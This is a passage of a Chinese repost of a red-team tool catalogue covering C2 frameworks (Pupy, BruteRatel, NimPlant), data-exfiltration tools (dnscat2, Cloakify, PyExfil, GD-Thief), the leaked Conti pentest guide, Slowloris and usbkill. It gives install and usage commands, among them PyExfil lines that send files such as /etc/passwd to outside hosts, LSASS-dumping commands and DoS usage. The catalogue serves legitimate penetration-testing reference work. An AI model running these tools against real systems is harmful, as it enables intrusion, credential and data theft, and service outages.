sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
git clone --recursive https://github.com/n1nj4sec/pupy cd pupy
python create-workspace.py -DG pupyw

滚动修复以修复错误:

sudo pip2 install rpyc==3.4.4

开始:

export PATH=$PATH:~/.local/bin; pupysh
pupyws/bin/pupysh

从这里使用的 Git 安装说明。

安装:(docker)

有关详细的 docker 和 pupy 安装说明,请参阅wiki

用法:

# Get help page for any builtin commands with -h >> sessions -h >> jobs -h >> run -h # Interact with session 1 >> sessions -i 1 # Run local command 'ls' >> !ls

可以在wiki上找到完整的使用信息。

该 wiki 包含很好的后渗透信息


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第101
张图片

图片来自https://github.com/n1nj4sec/pupy/wiki/Screenshots

BruteRatel

BruteRatel 是一个很棒的命令和控制 (C4) 框架,由@NinjaParanoid创建。该框架由安装在受感染系统上的客户端组件“badger”和由红队运行的服务器组件“commander”组成。

客户端和服务器使用各种通信渠道(例如 HTTP、DNS 或 TCP)相互通信,并且可以配置为使用不同的编码和加密方法来逃避检测。

一些不错的功能:

  • 通过 HTTPS 的 DNS
  • 间接系统调用
  • 用于检测 EDR Userland 挂钩的内置调试器
  • MITRE 图形集成
  • 对手 TTP 自动化

安装:

要合法访问该框架,您需要购买许可证(1 年每位用户 2500 美元)。有关详细信息,请参阅定价页面。

购买后,您可以使用您的激活密钥和许可证用户 ID 从此处下载框架。

用法:

# Loads a powershell script to memory which can be Invoked using psreflect psimport # Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock lock_input # Dumps user clipboard dumpclip # Enumerates basic domain information dcenum # Elevates user privileges to SYSTEM (Requires admin rights) get_system # Takes a screenshot of current desktop and stores it on the server screenshot # Dumps LSASS to C:WindowsMemory.DMP using the PssCaptureSnapshot technique shadowclone

可以在此处找到完整的指挥官终端使用信息。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第102
张图片

图片来自https://bruteratel.com/

NimPlant

用 Nim 编写的轻量级第一阶段 C2 植入程序。

特征:

  • 用 Nim 编程语言编写的轻量级可配置植入程序
  • 默认情况下对所有流量进行加密和压缩,混淆植入物中的静态字符串
  • 支持多种植入类型,包括本机二进制文件 (exe/dll)、shellcode 或自删除可执行文件
  • inline-execute通过、shinject(使用动态调用)或线程内轻松部署更高级的功能或有效载荷execute-assembly
  • 全面记录所有交互和文件操作

安装:

curl https://nim-lang.org/choosenim/init.sh -sSf | sh
choosenim stable
git clone https://github.com/chvancooten/NimPlant cd client
nimble install -d
pip3 install -r server/requirements.txt
apt install mingw-w64

用法:

# Generate payloads python .NimPlant.py compile all # Start server python .NimPlant.py server 

在运行之前确保创建配置文件,更多信息可以在这里config.tool找到。

完整的使用信息可以在这里找到。

博客 – 在 Nim 中构建 C2 植入 – 考虑因素和经验教训


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第103
张图片

图片来自https://casvancooten.com

Exfiltration

Dnscat2

一种通过 DNS 建立 C2 连接的工具,即使攻击者和受害者机器位于防火墙/网络地址转换 (NAT) 后面。

该工具被设计为隐蔽且难以检测,因为它使用合法的 DNS 流量来传输数据。

安装:(编译 – 服务器)

git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/
gem install bundler
bundle install

安装:(编译 – 客户端)

git clone https://github.com/iagox86/dnscat2.git cd dnscat2/client/
make

完整的安装信息可以在安装部分找到。

用法:(服务器)

# Establish the server ruby ./dnscat2.rb DOMAIN.COM

用法:(客户端)

# Establish the client with authoritative domain ./dnscat2 DOMAIN.COM # Establish the client without authoritative domain ./dnscat2 --dns host=0.0.0.0,port=0000 # Ping the server from the client ./dnscat --ping DOMAIN.COM # Ping the server from the client, with custom dns resolver ip ./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping

用法:(隧道)

# (After establishing the client) You can open a new tunnelled port listen [lhost:]lport rhost:rport # Forward ssh connections through the dnscat2 client to an internal device listen 127.0.0.1:2222 10.10.10.10:22

完整的使用信息可以在使用部分找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第104
张图片

Cloakify

当泄露受害者文件时,DLP(数据丢失防护)解决方案通常会触发这些文件中的字符串。Cloakify 通过转换数据降低了这种风险。

Cloakify 将任何文件类型(例如 .zip、.exe、.xls 等)转换为看似无害的字符串列表。这使您可以将文件隐藏在众目睽睽之下,并在不触发警报的情况下传输文件。

注意:您可以制作自己的密码,请参阅此处了解更多信息。

安装:

git clone https://github.com/TryCatchHCF/Cloakify

用法:

# Cloakify some text python3 cloakify.py TEXT.txt ciphers/desserts.ciph > TEXT.cloaked

# De-Cloakify the text python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第105
张图片

PyExfil

“一个 Alpha-Alpha 阶段包,尚未经过测试(并将感谢任何反馈和承诺),旨在展示几种数据泄露技术是真实场景。”

安装:

git clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install

用法:(此处完整用法)

HTTP cookies

from pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen # For Client (exfil) send_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL) # For Server (collecting) listen(local_addr='127.0.0.1', local_port=80)

ICMP Echo 8

from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener # For Client (exfil) ip_addr = "127.0.0.1" send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1) # For Server (collecting) init_listener(ip_addr, saving_location="/tmp/")

NTP请求

from pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT # For Client (exfil) ip_addr = "127.0.0.1" exfiltrate("/etc/passwd", ip_addr, time_delay=0.1) # For Server (collecting) ntp_listener(ip="0.0.0.0", port=NTP_UDP_PORT)


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第106
张图片

Powershell RAT

基于 Python 的后门,使用 Gmail 将数据作为电子邮件附件泄露。它使用屏幕捕获跟踪用户活动,并将信息作为电子邮件附件发送给攻击者。

安装:

git clone https://github.com/Viralmaniar/Powershell-RAT

用法:(此处完整用法)

设置

项目地址

GitHub:
https://github.com/A-poc/RedTeam-Tools


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第107
张图片

GD-Thief

通过 Google 的 API 从您有权访问的目标 Google Drive 中窃取文件的工具。

这包括所有共享文件、共享驱动器中的所有文件以及目标有权访问的域驱动器中的所有文件。

安装:

git clone https://github.com/antman1p/GD-Thief.git cd GD-Thief
pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib

然后…

  1. 创建一个新的谷歌云平台 (GCP) 项目
  2. 启用 Google Workspace API
  3. 配置 OAuth 同意屏幕
  4. 创建凭证
  5. 将受害者的 Google 帐户添加到应用程序的测试用户

有关详细的设置说明,请参阅操作指南

用法:

usage:
python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d]}
    [-t]

help:

This Module will connect to Google's API using an access token and exfiltrate files
from a target's Google Drive.  It will output exfiltrated files to the ./loot directory

arguments:
        -m [{dlAll, dlDict}],
                --mode [{dlAll, dlDict}]
                The mode of file download
                Can be "dlAll", "dlDict [-d]", or... (More options to come)

optional arguments:
        -d, --dictPath to the dictionary file. Mandatory with download mode"-m, --mode dlDict" You can use the provided dictionary, per example: "-d ./dictionaries/secrets-keywords.txt" -t, --threadsNumber of threads. (Too many could exceeed Google's rate limit threshold)

        -h, --help
                show this help message and exit

不错的博文解释了该工具背后的逻辑。

影响

Conti Pentester 泄漏指南

Conti 是一个勒索软件组织,以针对大型组织并使用复杂的策略来逃避检测和最大化攻击影响而闻名。

Conti 对多起备受瞩目的勒索软件攻击负责,包括针对佛罗里达州彭萨科拉市计算机系统和爱尔兰卫生服务计算机系统的攻击。

Conti Pentester Guide Leak – Repository包含泄露给 Conti 勒索软件集团附属机构的渗透测试材料。

主题包括:

  • 使用 MEGA 配置 Rclone 以进行数据泄露
  • 将 AnyDesk 配置为对受害者网络的持久性和远程访问
  • 在公司被黑网络中提升并获得管理员权限
  • 接管域控制器
  • 从 Active Directory 中转储密码

注意: vx-underground.org在此处获得了更多 Conti 勒索软件操作员使用的培训材料和工具。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第108
张图片

图片来自https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak

SlowLoris

Slowloris 是一种拒绝服务 (DoS) 攻击,它涉及以捆绑服务器资源的方式向 Web 服务器发送 HTTP 请求,使其无法处理合法请求。

这种攻击通常使用僵尸网络进行,它被设计为难以检测和缓解,因为它使用相对较少的连接并且不会产生大量流量。

安装:(pip

sudo pip3 install slowloris

安装:(Git)

git clone https://github.com/gkbrk/slowloris.git cd slowloris

用法:

# Pip slowloris example.com # Git python3 slowloris.py example.com


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第109
张图片

usbkill

这是一个反取证终止开关,等待 USB 端口状态发生变化,如果检测到变化,立即关闭端点。

在某些情况下,不得通过 USB 从端点添加或删除任何数据。

这就是 USBkill 的用武之地。

安装:

git clone https://github.com/hephaest0s/usbkill cd usbkill
./setup.py install

用法:

sudo python3 usbkill.py


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第110
张图片

图片来自https://en.wikipedia.org/wiki/USBKill

项目地址:

Github:
https://github.com/A-poc/RedTeam-Tools

版权所有:纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
文章标题:RedTeam Tools 红队渗透测试工具清单
除非注明,文章均为 纵横安全网-渗透测试-软件开发-前端开发-PHP全栈 原创,请勿用于任何商业用途,禁止转载

扫描二维码,在手机上阅读

版权说明
文章采用: 《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
版权声明:未标注转载均为本站原创,转载时请以链接形式注明文章出处。如有侵权、不妥之处,请联系站长删除。敬请谅解!

-- 展开阅读全文 --
Spring_All_Reachable Spring漏洞综合利用工具
« 上一篇
Burp Suite 最新版(有下载链接)
下一篇 »
为了防止灌水评论,登录后即可评论!

HI ! 请登录
注册会员,享受下载全站资源特权。

最新评论

标签